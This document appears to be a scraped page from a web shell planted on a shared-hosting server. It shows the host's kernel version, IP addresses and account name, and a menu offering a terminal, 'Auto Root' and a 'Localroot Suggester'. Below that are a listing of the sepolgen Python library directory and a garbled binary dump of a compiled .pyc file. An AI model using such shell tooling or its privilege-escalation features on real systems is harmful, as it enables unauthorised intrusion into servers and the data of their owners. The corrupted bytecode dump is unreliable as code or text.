Linux yavrix.internet-webhosting.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 103.8.25.136 & Your IP : 216.73.216.149
Domains :
Cant Read [ /etc/named.conf ]
User : klinikpe
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib64 /
python2.7 /
site-packages /
sepolgen /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.py
0
B
-rw-r--r--
2020-04-01 04:04
__init__.pyc
142
B
-rw-r--r--
2020-04-01 04:04
__init__.pyo
142
B
-rw-r--r--
2020-04-01 04:04
access.py
12.33
KB
-rw-r--r--
2020-04-01 04:04
access.pyc
13.18
KB
-rw-r--r--
2020-04-01 04:04
access.pyo
13.18
KB
-rw-r--r--
2020-04-01 04:04
audit.py
23.64
KB
-rw-r--r--
2020-04-01 04:04
audit.pyc
22.33
KB
-rw-r--r--
2020-04-01 04:04
audit.pyo
22.33
KB
-rw-r--r--
2020-04-01 04:04
classperms.py
2.75
KB
-rw-r--r--
2020-04-01 04:04
classperms.pyc
3.16
KB
-rw-r--r--
2020-04-01 04:04
classperms.pyo
3.16
KB
-rw-r--r--
2020-04-01 04:04
defaults.py
2.69
KB
-rw-r--r--
2020-04-01 04:04
defaults.pyc
2.87
KB
-rw-r--r--
2020-04-01 04:04
defaults.pyo
2.87
KB
-rw-r--r--
2020-04-01 04:04
interfaces.py
16.21
KB
-rw-r--r--
2020-04-01 04:04
interfaces.pyc
15.86
KB
-rw-r--r--
2020-04-01 04:04
interfaces.pyo
15.86
KB
-rw-r--r--
2020-04-01 04:04
lex.py
32.86
KB
-rw-r--r--
2020-04-01 04:04
lex.pyc
19.24
KB
-rw-r--r--
2020-04-01 04:04
lex.pyo
19.24
KB
-rw-r--r--
2020-04-01 04:04
matching.py
8.45
KB
-rw-r--r--
2020-04-01 04:04
matching.pyc
7.4
KB
-rw-r--r--
2020-04-01 04:04
matching.pyo
7.4
KB
-rw-r--r--
2020-04-01 04:04
module.py
7.12
KB
-rw-r--r--
2020-04-01 04:04
module.pyc
8.4
KB
-rw-r--r--
2020-04-01 04:04
module.pyo
8.4
KB
-rw-r--r--
2020-04-01 04:04
objectmodel.py
6.37
KB
-rw-r--r--
2020-04-01 04:04
objectmodel.pyc
4.64
KB
-rw-r--r--
2020-04-01 04:04
objectmodel.pyo
4.64
KB
-rw-r--r--
2020-04-01 04:04
output.py
5.01
KB
-rw-r--r--
2020-04-01 04:04
output.pyc
4.51
KB
-rw-r--r--
2020-04-01 04:04
output.pyo
4.51
KB
-rw-r--r--
2020-04-01 04:04
policygen.py
16.31
KB
-rw-r--r--
2020-04-01 04:04
policygen.pyc
15.25
KB
-rw-r--r--
2020-04-01 04:04
policygen.pyo
15.18
KB
-rw-r--r--
2020-04-01 04:04
refparser.py
30.2
KB
-rw-r--r--
2020-04-01 04:04
refparser.pyc
36.27
KB
-rw-r--r--
2020-04-01 04:04
refparser.pyo
36.27
KB
-rw-r--r--
2020-04-01 04:04
refpolicy.py
27.31
KB
-rw-r--r--
2020-04-01 04:04
refpolicy.pyc
46.45
KB
-rw-r--r--
2020-04-01 04:04
refpolicy.pyo
46.45
KB
-rw-r--r--
2020-04-01 04:04
sepolgeni18n.py
912
B
-rw-r--r--
2020-04-01 04:04
sepolgeni18n.pyc
410
B
-rw-r--r--
2020-04-01 04:04
sepolgeni18n.pyo
410
B
-rw-r--r--
2020-04-01 04:04
util.py
5.41
KB
-rw-r--r--
2020-04-01 04:04
util.pyc
7.87
KB
-rw-r--r--
2020-04-01 04:04
util.pyo
7.87
KB
-rw-r--r--
2020-04-01 04:04
yacc.py
80.04
KB
-rw-r--r--
2020-04-01 04:04
yacc.pyc
41.4
KB
-rw-r--r--
2020-04-01 04:04
yacc.pyo
41.4
KB
-rw-r--r--
2020-04-01 04:04
Save
Rename
� ��^c @ s� d Z d d d d d d d d d g Z d Z d Z d Z e e BZ i e d 6e d 6e d 6e d 6Z i d e 6d e 6d e 6d e 6Z d d d � � YZ d d d � � YZ d S( s� This module provides knowledge object classes and permissions. It should be used to keep this knowledge from leaking into the more generic parts of the policy generation. t sockett fdt processt filet lnk_filet fifo_filet dbust capabilityt unix_stream_socketi i i t nt rt wt bt PermMapc B s e Z d Z d � Z d � Z RS( s A mapping between a permission and its information flow properties. PermMap represents the information flow properties of a single permission including the direction (read, write, etc.) and an abstract representation of the bandwidth of the flow (weight). c C s | | _ | | _ | | _ d S( N( t permt dirt weight( t selfR R R ( ( s: /usr/lib64/python2.7/site-packages/sepolgen/objectmodel.pyt __init__T s c C s d | j t | j | j f S( Ns'